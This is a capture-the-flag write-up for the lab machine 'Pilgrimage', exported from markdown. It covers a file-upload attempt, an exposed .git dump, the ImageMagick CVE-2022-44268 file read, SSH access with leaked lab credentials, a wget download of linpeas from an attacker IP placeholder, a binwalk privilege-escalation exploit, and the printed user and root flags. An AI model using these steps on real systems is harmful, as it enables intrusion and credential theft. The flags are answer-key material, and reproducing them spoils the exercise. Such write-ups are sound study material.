Pilgrimage https://md2pdf.netlify.

app/

Pilgrimage
Created: July 6, 2023 11:04 PM Tags: Easy

Enumeration

nmap -sCV 10.10.11.219

Untitled

Webapp
Untitled

On the home page we can see a file upload form which could be used to perform a file upload
exploit. https://book.hacktricks.xyz/pentesting-web/file-upload

In the menu source code we can see that the backend is using php therefore we can try to upload
php files and access them after to see if our code is executed or not.

Untitled

Here is an example of the php file to POC a RCE in our app:

<?php

exec('ls', $output);

?>

When trying to upload this file you will face an issue, the webapp doesn’t allow you to upload a
php file. This is due to the html input tag which contains an accept parameter allowing only png
and jpeg files.

Untitled

To bypass this 2 techniques could work:

1 sur 5 29/11/2024 14:11

Pilgrimage https://md2pdf.netlify.app/

• upload the file with 2 extensions such as file.php.png

• change the html in our browser to accept php file but this can only work if the check isn’t also
done in the backend

.git directory exposed

Untitled

→ index file

Untitled

Dump the .git content

Using the git-dumper https://github.com/arthaud/git-dumper utility we can gather the content of
the backend and to look into the files content.

Untitled

As we can see through the magick binary the backend is using ImageMagick to manipulate the
images. When looking for ImageMagick exploitation paths on the web I found a few interesting
pages:

• https://www.synacktiv.com/en/publications/playing-with-imagetragick-like-its-2016 & https://

www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ : Didn’t manage
to make the exploits from these pages work
• https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC : This one
is based on CVE-2022-44268 which works on magick 7.1.0-49 . You can check the version
of the binary running

./magick -version

However this fails because the binary isn’t compatible with my pc architecture (arm64).

Untitled

→ Therefore I choose to test it the hard by creating the image following and the POC and see if it
works or not and surprise it works !

convert -size 320x240 xc:skyblue input.png

pngcrush -text a "profile" "/etc/hosts" input.png crushed_input.png

2 sur 5 29/11/2024 14:11

Pilgrimage https://md2pdf.netlify.app/

exiv2 -pS crushed_input.png #verify the output

### Upload the crushed_input.png image on pilgrimage.htb

### Follow the link that the app responds to us and download the image that appears
### Run the following steps on the downloaded image

identify -verbose download.png

python3 -c 'print(bytes.fromhex("<HEX_CONTENT>").decode("utf-8"))'

Here is how you identify the HEX_CONTENT value:

Untitled

After running the python command to decode the hexadecimal output we can clearly see the
output of the shell command we injected in our image:

We can now repeat this to further explore the server we are targeting.

Initial Access
Looking for the an initial access i tried to access common files to get information about the host:

• /etc/passwd

Untitled

• /var/db/pilgrimage

From the login.php we collected in the git dump we can see a full path to a database file which is
used for authentication

Untitled

By collecting this file we can see the content of the sqlite database. However when using the
standard process given in the POC the HEX decoding to UTF-8 fails and therefore I ended up
using an online tool such as https://www.duplichecker.com/hex-to-text.php or https://
gchq.github.io/CyberChef/. Now we can read the the database content, this due to the fact that
sqlite is a database written in plain-text into text files, and figure some default credentials along
with the user we created (test:test):

Untitled

→ emily:abigchonkyboi123 As emily is the user we found in the /etc/passwd file this seems like a
very promising initial access to the host via ssh.

3 sur 5 29/11/2024 14:11

Pilgrimage https://md2pdf.netlify.app/

ssh [email protected]
# enter abigchonkyboi123

Et voila

Untitled

First flag
The first flag can be found in the user.txt file:

d5e6dcc948db1aa7a694d06d1795d506

Host Enumeration

Linpeas
Being on a linux host we run linpeas to automate some of the host enumeration tasks.

To do so:

• first download linpeas.sh from their webpage: http://linpeas.sh

• put in a directory which you can expose and start a basic python web server to expose the file
system:

python -m http.server 8000

• from the target use wget to collect the script

wget <attacker_VPN_IP>:8000/linpeas.sh

• make the script executable and run it

chmod +x linpeas.sh
./linpeas.sh

4 sur 5 29/11/2024 14:11

Pilgrimage https://md2pdf.netlify.app/

→ Nothing interesting really pops out

Pspy
Through pspy we can that the malwarescan.sh script is launched frequently to make sure that
inotifywait is running on the /var/www/pilgrimage.htb/shrunk directory waiting for the creation of
new files

Untitled

Here is the content of malwarescan.sh:

Untitled

We can test this by creating a new file under /var/www/pilgrimage.htb/shrunk and see what
happens with pspy:

touch /var/www/pilgrimage.htb/shrunk/test.sh

Untitled

As we can when inotifywait catches a new the binwalk binary is executed onto it. By looking at this
binary help we can find it’s version and by googling it we can easily find an exploit to build an
image that will allow you to get the root access.

Untitled

Privilege Escalation
https://www.exploit-db.com/exploits/51249

Untitled

→ root shell

cat /root/root.txt
7d8c6af104c86b24ec0af8245a93171d

5 sur 5 29/11/2024 14:11